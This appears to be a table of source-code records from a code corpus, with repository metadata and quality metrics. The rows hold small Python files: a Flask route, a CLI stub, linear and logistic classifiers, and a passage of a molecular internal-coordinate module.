hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
234472be1dc2e6a66f78bc106660e43720d56932 | 108 | py | Python | utilities/autoware_launcher/src/autoware_launcher/core/__init__.py | alanjclark/autoware.ai | ba97edbbffb6f22e78912bf96400a59ef6a13daf | [
"Apache-2.0"
] | 20 | 2019-05-21T06:14:17.000Z | 2021-11-03T04:36:09.000Z | ros/src/util/packages/autoware_launcher/src/autoware_launcher/core/__init__.py | anhnv3991/autoware | d5b2ed9dc309193c8a2a7c77a2b6c88104c28328 | [
"Apache-2.0"
] | 40 | 2019-06-24T16:56:15.000Z | 2022-02-28T13:41:58.000Z | ros/src/util/packages/autoware_launcher/src/autoware_launcher/core/__init__.py | anhnv3991/autoware | d5b2ed9dc309193c8a2a7c77a2b6c88104c28328 | [
"Apache-2.0"
] | 31 | 2020-05-29T07:51:58.000Z | 2022-03-26T05:46:33.000Z | from .server import AwLaunchServer
from .server import AwLaunchServerIF
from .server import AwLaunchClientIF | 36 | 36 | 0.87037 | 12 | 108 | 7.833333 | 0.5 | 0.319149 | 0.510638 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101852 | 108 | 3 | 37 | 36 | 0.969072 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
88f259189f5fe236f18d3d9c3f51a36c34843702 | 179 | py | Python | app/blueprints/users/routes.py | bvelica/flask-boilerplate-app | 41362bf9fac63c3ef9989ec2a8cf25da5c407b22 | [
"MIT"
] | null | null | null | app/blueprints/users/routes.py | bvelica/flask-boilerplate-app | 41362bf9fac63c3ef9989ec2a8cf25da5c407b22 | [
"MIT"
] | null | null | null | app/blueprints/users/routes.py | bvelica/flask-boilerplate-app | 41362bf9fac63c3ef9989ec2a8cf25da5c407b22 | [
"MIT"
] | null | null | null |
from flask import Blueprint
blueprint_users = Blueprint('users', __name__, url_prefix='/users')
@blueprint_users.route('/')
def users():
return 'Users page - blueprint users'
| 19.888889 | 67 | 0.743017 | 22 | 179 | 5.727273 | 0.545455 | 0.444444 | 0.301587 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122905 | 179 | 8 | 68 | 22.375 | 0.802548 | 0 | 0 | 0 | 0 | 0 | 0.224719 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0.8 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 7 |
0000fa8f2d70592b5ba91e1ed71c42ac79a16509 | 67 | py | Python | starfiles/deneme.py | harunlakodla/Flutter_Python-flutter_python | 9dfa020fd73bff3bcf965476060ca441349ba96b | [
"Apache-2.0"
] | 10 | 2020-02-02T21:47:34.000Z | 2022-02-05T23:55:15.000Z | starfiles/deneme.py | harunlakodla/Flutter_Python-flutter_python | 9dfa020fd73bff3bcf965476060ca441349ba96b | [
"Apache-2.0"
] | 1 | 2021-11-02T10:43:48.000Z | 2021-11-02T10:43:48.000Z | starfiles/deneme.py | harunlakodla/Flutter_Python-flutter_python | 9dfa020fd73bff3bcf965476060ca441349ba96b | [
"Apache-2.0"
] | null | null | null | print("merhaba")
print("merhaba")
print("merhaba")
print("merhaba") | 16.75 | 16 | 0.716418 | 8 | 67 | 6 | 0.25 | 1 | 1.0625 | 1.5 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044776 | 67 | 4 | 17 | 16.75 | 0.75 | 0 | 0 | 1 | 0 | 0 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 10 |
004e1bbfa4f011603c255ab0bc51ef85830a4426 | 167 | py | Python | cli/commands/cmd_setup.py | kimoantiqe/Sail | c560d71a1ed34c8f762523b826a0d71a2e258f8c | [
"MIT"
] | 1 | 2019-02-16T04:05:11.000Z | 2019-02-16T04:05:11.000Z | cli/commands/cmd_setup.py | kimoantiqe/Sail | c560d71a1ed34c8f762523b826a0d71a2e258f8c | [
"MIT"
] | null | null | null | cli/commands/cmd_setup.py | kimoantiqe/Sail | c560d71a1ed34c8f762523b826a0d71a2e258f8c | [
"MIT"
] | null | null | null | import click
from cli import pass_context
@click.command('setup', short_help='Sets up sail on VPS')
@pass_context
def cli(ctx):
    """Sets up sail on VPS"""
#TODO | 18.555556 | 56 | 0.706587 | 26 | 167 | 4.423077 | 0.653846 | 0.191304 | 0.208696 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167665 | 167 | 9 | 57 | 18.555556 | 0.827338 | 0.137725 | 0 | 0 | 0 | 0 | 0.165468 | 0 | 0 | 0 | 0 | 0.111111 | 0 | 1 | 0.2 | false | 0.4 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
cc3980ec5626089db99cbe6d4e98f172f3d7302e | 6,816 | py | Python | scripts/classifiers.py | antjak/epfl-ml-project1 | 66f48afcaa3d82f0a3c4fc5bb4d22e8c20a57272 | [
"CECILL-B"
] | null | null | null | scripts/classifiers.py | antjak/epfl-ml-project1 | 66f48afcaa3d82f0a3c4fc5bb4d22e8c20a57272 | [
"CECILL-B"
] | null | null | null | scripts/classifiers.py | antjak/epfl-ml-project1 | 66f48afcaa3d82f0a3c4fc5bb4d22e8c20a57272 | [
"CECILL-B"
] | 3 | 2019-10-20T05:45:10.000Z | 2021-10-31T15:20:41.000Z | # -*- coding: utf-8 -*-
"""Classifiers"""
import numpy as np
import math
import solver
from implementations import log_1_plus_exp_safe
class LeastSquares:
"""Least squares classifier"""
def __init__(self, verbose=False, max_evaluations=100):
"""
Constructor
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.verbose = verbose
self.max_evaluations = max_evaluations
def fit(self, y, X):
"""
Finds weights to fit the data to the model
:param y: answers
:param X: data
"""
# dimensions
n, d = X.shape
# initial weight vector
self.w = np.zeros(d)
# find weights
self.w = np.linalg.solve(X.T @ X, X.T @ y)
def function_object(self, w, y, X):
"""
Function Object.
:param y: answers
:param X: data
:param w: weights
:return: loss, gradient
"""
# dimensions
n, d = X.shape
# compute error
e = y - X @ w
# compute loss
f = 1/(2 * n) * np.sum(e ** 2)
# compute gradient
g = - 1 / n * X.T @ e
return f, g
def predict(self, X):
"""
Predict
:param X: data
:return: answer prediction
"""
return np.sign(X @ self.w)
class LeastSquaresL2(LeastSquares):
"""L2-regularized Least Squares"""
def __init__(self, lambda_, verbose=False, max_evaluations=100):
"""
Constructor
        :param lambda_: regularization strength
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.lambda_ = lambda_
super().__init__(verbose, max_evaluations)
def fit(self, y, X):
"""
Finds weights to fit the data to the model
:param y: answers
:param X: data
"""
# dimensions
n, d = X.shape
# initial weight vector
self.w = np.zeros(d)
# find weights
self.w = np.linalg.solve(X.T @ X + n * self.lambda_ * np.eye(d), X.T @ y)
def function_object(self, w, y, X):
"""
Function Object.
:param y: answers
:param X: data
:param w: weights
:return: loss, gradient
"""
f, g = super().function_object(w, y, X)
# add regularization
f += self.lambda_ / 2 * w.dot(w)
g += self.lambda_ * w
return f, g
class LeastSquaresL1(LeastSquares):
"""L1-regularized Least Squares"""
def __init__(self, lambda_, verbose=False, max_evaluations=100):
"""
Constructor
        :param lambda_: regularization strength
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.lambda_ = lambda_
super().__init__(verbose, max_evaluations)
def fit(self, y, X):
"""
Finds weights to fit the data to the model
:param y: answers
:param X: data
"""
# dimensions
n, d = X.shape
# initial weight vector
self.w = np.zeros(d)
# fit weights
self.w, f = solver.gradient_descent_L1(self.function_object, self.w, self.lambda_,
self.max_evaluations, y, X, verbose=self.verbose)
class LogisticRegression:
"""Logistic Regression"""
def __init__(self, verbose=False, max_evaluations=100):
"""
Constructor
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.verbose = verbose
self.max_evaluations = max_evaluations
def fit(self, y, X):
"""
Finds weights to fit the data to the model
:param y: answers
:param X: data
"""
# dimensions
n, d = X.shape
# initial weight vector
self.w = np.zeros(d)
# fit weights
self.w, f = solver.gradient_descent(self.function_object, self.w,
self.max_evaluations, y, X, verbose=self.verbose)
def function_object(self, w, y, X):
"""
Function Object.
:param y: answers
:param X: data
:param w: weights
:return: loss, gradient
"""
pred = y * X.dot(w)
# function value
f = np.sum(log_1_plus_exp_safe(-pred))
# gradient value
res = - y / (1. + np.exp(pred))
g = X.T.dot(res)
return f, g
def predict(self, X):
"""
Predict
:param X: data
:return: answer prediction
"""
return np.sign(X @ self.w)
class LogisticRegressionL2(LogisticRegression):
"""L2-regularized Logistic Regression"""
def __init__(self, lambda_=1.0, verbose=False, max_evaluations=100):
"""
Constructor
        :param lambda_: strength of the L2 regularization
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.verbose = verbose
self.max_evaluations = max_evaluations
self.lambda_ = lambda_
    def function_object(self, w, y, X):
        """
        Function Object
        :param w: weight
        :param y: answers
        :param X: data
        :return: loss, gradient
        """
        # Obtain normal loss and gradient using the superclass
        f, g = super().function_object(w, y, X)
# Add L2 regularization
f += self.lambda_ / 2. * w.dot(w)
g += self.lambda_ * w
return f, g
class LogisticRegressionL1(LogisticRegression):
"""L1-regularized Logistic Regression"""
def __init__(self, lambda_=1.0, verbose=False, max_evaluations=100):
"""
Constructor
        :param lambda_: strength of the L1 regularization
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.verbose = verbose
self.max_evaluations = max_evaluations
self.lambda_ = lambda_
def fit(self, y, X):
"""
Finds weights to fit the data to the model
:param y: answers
:param X: data
"""
# dimensions
n, d = X.shape
# initial weight vector
self.w = np.zeros(d)
# fit weights
self.w, f = solver.gradient_descent_L1(self.function_object, self.w, self.lambda_,
self.max_evaluations, y, X, verbose=self.verbose)
| 23.027027 | 96 | 0.537119 | 768 | 6,816 | 4.639323 | 0.136719 | 0.098232 | 0.030873 | 0.045467 | 0.844513 | 0.825989 | 0.813079 | 0.805782 | 0.795116 | 0.795116 | 0 | 0.010402 | 0.365317 | 6,816 | 296 | 97 | 23.027027 | 0.813222 | 0.332453 | 0 | 0.683544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.21519 | false | 0 | 0.050633 | 0 | 0.417722 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
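The classifiers.py row above defines a `LeastSquares` class whose `fit` solves the normal equations directly. Since the file's `solver` and `implementations` dependencies are not included in this dump, here is a standalone sketch of that same closed-form solve on hypothetical data (the data and weights below are made up for illustration, not taken from the source):

```python
import numpy as np

# Minimal sketch of the closed-form fit used by LeastSquares.fit above:
# solve the normal equations (X^T X) w = X^T y for the weight vector.
rng = np.random.default_rng(0)
X = rng.normal(size=(100, 3))
w_true = np.array([1.0, -2.0, 0.5])      # hypothetical ground-truth weights
y = np.sign(X @ w_true)                  # +/-1 labels, matching predict()'s np.sign output

w = np.linalg.solve(X.T @ X, X.T @ y)    # same solve as in LeastSquares.fit
accuracy = np.mean(np.sign(X @ w) == y)  # fraction of labels recovered
```

On separable sign-labeled data like this, the least-squares weights recover the label direction closely, which is why the file's `predict` can get away with a plain `np.sign(X @ self.w)`.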
cc94dad7e1678fa8496649809f5574320f97aa47 | 42,684 | py | Python | slots.py | EmmanuelG0ldstein/pyGSM_AMS_3 | 87ae69647b469d05b7cdd74eb6996983ab709087 | [
"MIT"
] | null | null | null | slots.py | EmmanuelG0ldstein/pyGSM_AMS_3 | 87ae69647b469d05b7cdd74eb6996983ab709087 | [
"MIT"
] | null | null | null | slots.py | EmmanuelG0ldstein/pyGSM_AMS_3 | 87ae69647b469d05b7cdd74eb6996983ab709087 | [
"MIT"
] | null | null | null | import numpy as np
from .nifty import logger,commadash
from .rotate import get_expmap, get_expmap_der, is_linear
from ._math_utils import d_cross,d_ncross,d_unit_vector,d_cross_ab
class CartesianX(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w=1.0):
self.a = a
self.w = w
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
return "Cartesian-X %i" % (self.a+1)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = self.a == other.a
if eq and self.w != other.w:
logger.warning("Warning: CartesianX same atoms, different weights (%.4f %.4f)" % (self.w, other.w))
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
return xyz[a][0]*self.w
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
derivatives[self.a][0] = self.w
return derivatives
class CartesianY(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w=1.0):
self.a = a
self.w = w
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
# return "Cartesian-Y %i : Weight %.3f" % (self.a+1, self.w)
return "Cartesian-Y %i" % (self.a+1)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = self.a == other.a
if eq and self.w != other.w:
logger.warning("Warning: CartesianY same atoms, different weights (%.4f %.4f)" % (self.w, other.w))
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
return xyz[a][1]*self.w
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
derivatives[self.a][1] = self.w
return derivatives
class CartesianZ(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w=1.0):
self.a = a
self.w = w
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
# return "Cartesian-Z %i : Weight %.3f" % (self.a+1, self.w)
return "Cartesian-Z %i" % (self.a+1)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = self.a == other.a
if eq and self.w != other.w:
logger.warning("Warning: CartesianZ same atoms, different weights (%.4f %.4f)" % (self.w, other.w))
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
return xyz[a][2]*self.w
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
derivatives[self.a][2] = self.w
return derivatives
class TranslationX(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w):
self.a = a
self.w = w
assert len(a) == len(w)
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
# return "Translation-X %s : Weights %s" % (' '.join([str(i+1) for i in self.a]), ' '.join(['%.2e' % i for i in self.w]))
return "Translation-X %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
if eq and np.sum((self.w-other.w)**2) > 1e-6:
logger.warning("Warning: TranslationX same atoms, different weights")
eq = False
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
return np.sum(xyz[a,0]*self.w)
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
for i, a in enumerate(self.a):
derivatives[a][0] = self.w[i]
return derivatives
class TranslationY(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w):
self.a = a
self.w = w
assert len(a) == len(w)
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
# return "Translation-Y %s : Weights %s" % (' '.join([str(i+1) for i in self.a]), ' '.join(['%.2e' % i for i in self.w]))
return "Translation-Y %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
if eq and np.sum((self.w-other.w)**2) > 1e-6:
logger.warning("Warning: TranslationY same atoms, different weights")
eq = False
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
return np.sum(xyz[a,1]*self.w)
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
for i, a in enumerate(self.a):
derivatives[a][1] = self.w[i]
return derivatives
class TranslationZ(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w):
self.a = a
self.w = w
assert len(a) == len(w)
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
# return "Translation-Z %s : Weights %s" % (' '.join([str(i+1) for i in self.a]), ' '.join(['%.2e' % i for i in self.w]))
return "Translation-Z %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
if eq and np.sum((self.w-other.w)**2) > 1e-6:
logger.warning("Warning: TranslationZ same atoms, different weights")
eq = False
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
return np.sum(xyz[a,2]*self.w)
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
for i, a in enumerate(self.a):
derivatives[a][2] = self.w[i]
return derivatives
class Rotator(object):
__slots__=['a','x0','stored_value','stored_valxyz','stored_deriv','stored_derxyz','stored_norm','e0','stored_dot2','linear']
def __init__(self, a, x0):
self.a = list(tuple(sorted(a)))
x0 = x0.reshape(-1, 3)
self.x0 = x0.copy()
self.stored_valxyz = np.zeros_like(x0)
self.stored_value = None
self.stored_derxyz = np.zeros_like(x0)
self.stored_deriv = None
self.stored_norm = 0.0
# Extra variables to account for the case of linear molecules
# The reference axis used for computing dummy atom position
self.e0 = None
# Dot-squared measures alignment of molecule long axis with reference axis.
# If molecule becomes parallel with reference axis, coordinates must be reset.
self.stored_dot2 = 0.0
# Flag that records linearity of molecule
self.linear = False
def reset(self, x0):
x0 = x0.reshape(-1, 3)
self.x0 = x0.copy()
self.stored_valxyz = np.zeros_like(x0)
self.stored_value = None
self.stored_derxyz = np.zeros_like(x0)
self.stored_deriv = None
self.stored_norm = 0.0
self.e0 = None
self.stored_dot2 = 0.0
self.linear = False
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
if eq and np.sum((self.x0-other.x0)**2) > 1e-6:
logger.warning("Warning: Rotator same atoms, different reference positions")
return eq
def __repr__(self):
return "Rotator %s" % commadash(self.a)
def __ne__(self, other):
return not self.__eq__(other)
def calc_e0(self):
"""
Compute the reference axis for adding dummy atoms.
Only used in the case of linear molecules.
We first find the Cartesian axis that is "most perpendicular" to the molecular axis.
Next we take the cross product with the molecular axis to create a perpendicular vector.
Finally, this perpendicular vector is normalized to make a unit vector.
"""
ysel = self.x0[self.a, :]
vy = ysel[-1]-ysel[0]
ev = vy / np.linalg.norm(vy)
# Cartesian axes.
ex = np.array([1.0,0.0,0.0])
ey = np.array([0.0,1.0,0.0])
ez = np.array([0.0,0.0,1.0])
self.e0 = np.cross(vy, [ex, ey, ez][np.argmin([np.dot(i, ev)**2 for i in [ex, ey, ez]])])
self.e0 /= np.linalg.norm(self.e0)
def value(self, xyz):
xyz = xyz.reshape(-1, 3)
if np.max(np.abs(xyz-self.stored_valxyz)) < 1e-12:
return self.stored_value
else:
xsel = xyz[self.a, :]
ysel = self.x0[self.a, :]
xmean = np.mean(xsel,axis=0)
ymean = np.mean(ysel,axis=0)
if not self.linear and is_linear(xsel, ysel):
# print "Setting linear flag for", self
self.linear = True
if self.linear:
# Handle linear molecules.
vx = xsel[-1]-xsel[0]
vy = ysel[-1]-ysel[0]
# Calculate reference axis (if needed)
if self.e0 is None: self.calc_e0()
#log.debug(vx)
ev = vx / np.linalg.norm(vx)
# Measure alignment of molecular axis with reference axis
self.stored_dot2 = np.dot(ev, self.e0)**2
# Dummy atom is located one Bohr from the molecular center, direction
# given by cross-product of the molecular axis with the reference axis
xdum = np.cross(vx, self.e0)
ydum = np.cross(vy, self.e0)
exdum = xdum / np.linalg.norm(xdum)
eydum = ydum / np.linalg.norm(ydum)
xsel = np.vstack((xsel, exdum+xmean))
ysel = np.vstack((ysel, eydum+ymean))
answer = get_expmap(xsel, ysel)
self.stored_norm = np.linalg.norm(answer)
self.stored_valxyz = xyz.copy()
self.stored_value = answer
return answer
def derivative(self, xyz):
xyz = xyz.reshape(-1, 3)
if np.max(np.abs(xyz-self.stored_derxyz)) < 1e-12:
return self.stored_deriv
else:
xsel = xyz[self.a, :]
ysel = self.x0[self.a, :]
xmean = np.mean(xsel,axis=0)
ymean = np.mean(ysel,axis=0)
if not self.linear and is_linear(xsel, ysel):
# print "Setting linear flag for", self
self.linear = True
if self.linear:
vx = xsel[-1]-xsel[0]
vy = ysel[-1]-ysel[0]
if self.e0 is None: self.calc_e0()
xdum = np.cross(vx, self.e0)
ydum = np.cross(vy, self.e0)
exdum = xdum / np.linalg.norm(xdum)
eydum = ydum / np.linalg.norm(ydum)
xsel = np.vstack((xsel, exdum+xmean))
ysel = np.vstack((ysel, eydum+ymean))
deriv_raw = get_expmap_der(xsel, ysel)
if self.linear:
# Chain rule is applied to get terms from
# dummy atom derivatives
nxdum = np.linalg.norm(xdum)
dxdum = d_cross(vx, self.e0)
dnxdum = d_ncross(vx, self.e0)
# Derivative of dummy atom position w/r.t. molecular axis vector
dexdum = (dxdum*nxdum - np.outer(dnxdum,xdum))/nxdum**2
# Here we may compute finite difference derivatives to check
# h = 1e-6
# fdxdum = np.zeros((3, 3), dtype=float)
# for i in range(3):
# vx[i] += h
# dPlus = np.cross(vx, self.e0)
# dPlus /= np.linalg.norm(dPlus)
# vx[i] -= 2*h
# dMinus = np.cross(vx, self.e0)
# dMinus /= np.linalg.norm(dMinus)
# vx[i] += h
# fdxdum[i] = (dPlus-dMinus)/(2*h)
# if np.linalg.norm(dexdum - fdxdum) > 1e-6:
# print dexdum - fdxdum
# raise Exception()
# Apply terms from chain rule
deriv_raw[0] -= np.dot(dexdum, deriv_raw[-1])
for i in range(len(self.a)):
deriv_raw[i] += np.dot(np.eye(3), deriv_raw[-1])/len(self.a)
deriv_raw[-2] += np.dot(dexdum, deriv_raw[-1])
deriv_raw = deriv_raw[:-1]
derivatives = np.zeros((xyz.shape[0], 3, 3), dtype=float)
for i, a in enumerate(self.a):
derivatives[a, :, :] = deriv_raw[i, :, :]
self.stored_derxyz = xyz.copy()
self.stored_deriv = derivatives
return derivatives
class RotationA(object):
__slots__=['a','x0','w','Rotator','isAngular','isPeriodic']
def __init__(self, a, x0, Rotators, w=1.0):
self.a = tuple(sorted(a))
self.x0 = x0
self.w = w
if self.a not in Rotators:
Rotators[self.a] = Rotator(self.a, x0)
self.Rotator = Rotators[self.a]
self.isAngular = True
self.isPeriodic = False
def __repr__(self):
# return "Rotation-A %s : Weight %.3f" % (' '.join([str(i+1) for i in self.a]), self.w)
return "Rotation-A %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
# if eq and np.sum((self.w-other.w)**2) > 1e-6:
# print "Warning: RotationA same atoms, different weights"
# if eq and np.sum((self.x0-other.x0)**2) > 1e-6:
# print "Warning: RotationA same atoms, different reference positions"
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
return self.Rotator.value(xyz)[0]*self.w
def derivative(self, xyz):
der_all = self.Rotator.derivative(xyz)
derivatives = der_all[:, :, 0]*self.w
return derivatives
class RotationB(object):
__slots__=['a','x0','w','Rotator','isAngular','isPeriodic']
def __init__(self, a, x0, Rotators, w=1.0):
self.a = tuple(sorted(a))
self.x0 = x0
